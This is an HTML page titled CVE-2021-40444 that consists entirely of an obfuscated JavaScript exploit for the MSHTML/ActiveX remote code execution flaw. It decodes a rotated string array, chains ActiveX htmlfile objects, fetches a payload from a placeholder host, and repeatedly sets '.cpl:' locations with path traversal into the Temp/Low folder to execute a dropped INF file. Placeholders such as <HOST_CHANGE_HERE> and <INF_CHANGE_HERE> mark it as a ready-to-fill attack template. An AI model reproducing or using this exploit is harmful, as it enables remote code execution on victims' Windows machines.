<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="X-UA-Compatible" content="IE=11">
    <title>CVE-2021-40444</title>
</head>
<body>
<script>
  'use strict';
/** @type {!Array} */
var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>", "htmlfile", "115924pLbIpw", "GET", 
"p/<INF_CHANGE_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"];
/**
 * @param {number} totalExpectedResults
 * @param {?} entrySelector
 * @return {?}
 */
function getValue(totalExpectedResults, entrySelector) {
  return getValue = function(state, value) {
    /** @type {number} */
    state = state - 170;
    var processorState = tokensArray[state];
    return processorState;
  }, getValue(totalExpectedResults, entrySelector);
}
(function(data, oldPassword) {
  /** @type {function(number, ?): ?} */
  var toMonths = getValue;
  for (; !![];) {
    try {
      /** @type {number} */
      var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218));
      if (userPsd === oldPassword) {
        break;
      } else {
        data["push"](data["shift"]());
      }
    } catch (_0x34af1e) {
      data["push"](data["shift"]());
    }
  }
})(tokensArray, 384881), function() {
  /**
   * @return {?}
   */
  function token_dash_lineno() {
    /** @type {function(number, ?): ?} */
    var addedRelations = currentRelations;
    return addedRelations(205);
  }
  /** @type {function(number, ?): ?} */
  var currentRelations = getValue;
  /** @type {!Window} */
  var global = window;
  var document = global["document"];
  var then = global["Document"]["prototype"]["createElement"];
  var writeFunction = global["Document"]["prototype"]["write"];
  var PL$22 = global["HTMLElement"]["prototype"]["appendChild"];
  var $ = global["HTMLElement"]["prototype"]["removeChild"];
  var el = then["call"](document, "iframe");
  try {
    PL$22["call"](document["body"], el);
  } catch (_0x1ab454) {
    PL$22["call"](document["documentElement"], el);
  }
  var ACTIVEX = el["contentWindow"]["ActiveXObject"];
  var model = new ACTIVEX("htmlfile");
  el["contentDocument"]["open"]()["close"]();
  /** @type {string} */
  var colname = "p";
  try {
    $["call"](document["body"], el);
  } catch (_0x3b004e) {
    $["call"](document["documentElement"], el);
  }
  model["open"]()["close"]();
  var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile");
  ops["open"]()["close"]();
  /** @type {string} */
  var _ = "c";
  var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile");
  TokenType["open"]()["close"]();
  var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile");
  view["open"]()["close"]();
  var iedom = new ActiveXObject("htmlfile");
  var rp_test = new ActiveXObject("htmlfile");
  var htmlfile = new ActiveXObject("htmlfile");
  var fake = new ActiveXObject("htmlfile");
  var doc = new ActiveXObject("htmlfile");
  var a = new ActiveXObject("htmlfile");
  var Object = global["XMLHttpRequest"];
  var args = new Object;
  var ast = Object["prototype"]["open"];
  var callbacks = Object["prototype"]["send"];
  var modelIns = global["setTimeout"];
  ast["call"](args, "GET", token_dash_lineno(), ![]);
  callbacks["call"](args);
  view["Script"]["document"]["write"]("<body>");
  var s = then["call"](view["Script"]["document"], "object");
  s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0");
  /** @type {string} */
  var i = "l";
  s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
  PL$22["call"](view["Script"]["document"]["body"], s);
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":123";
  /** @type {string} */
  iedom["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
  /** @type {string} */
  rp_test["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
  /** @type {string} */
  htmlfile["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
  /** @type {string} */
  fake["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
  /** @type {string} */
  doc["Script"]["location"] = ".cpl" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
  /** @type {string} */
  fake["Script"]["location"] = ".cpl" + ":../../../../../Temp/<INF_CHANGE_HERE>";
  /** @type {string} */
  fake["Script"]["location"] = ".cpl" + ":../../Low/<INF_CHANGE_HERE>";
  /** @type {string} */
  fake["Script"]["location"] = ".cpl" + ":../../<INF_CHANGE_HERE>";
}();

</script>

</body>
</html>